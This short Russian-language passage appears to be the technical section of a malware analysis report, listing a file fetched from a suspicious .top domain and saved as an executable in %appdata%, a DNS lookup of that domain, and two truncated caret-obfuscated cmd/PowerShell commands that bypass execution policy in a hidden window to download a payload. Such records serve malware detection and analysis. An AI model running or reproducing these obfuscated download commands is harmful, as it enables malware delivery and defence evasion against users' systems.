Техническая информация
- http://folueaport.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWeRs^H^ElL^.ExE -^EX^ECut^I^oNpo^li^CY^ ^ByPAsS ^-N^OPROF^Ile^ -W^I^ndow^StY^lE ^H^IDdeN (^NEw-^O^bJect s^ysteM.neT^.WE^b^clIeNt)^.D^O^WNlOAdF^il^e('http://folueaport.top/r...
- DNS ASK fo###aport.top
- '<SYSTEM32>\cmd.exe' /c "POWeRs^H^ElL^.ExE -^EX^ECut^I^oNpo^li^CY^ ^ByPAsS ^-N^OPROF^Ile^ -W^I^ndow^StY^lE ^H^IDdeN (^NEw-^O^bJect s^ysteM.neT^.WE^b^clIeNt)^.D^O^WNlOAdF^il^e('http://folueaport.top/r...' (со скрытым окном)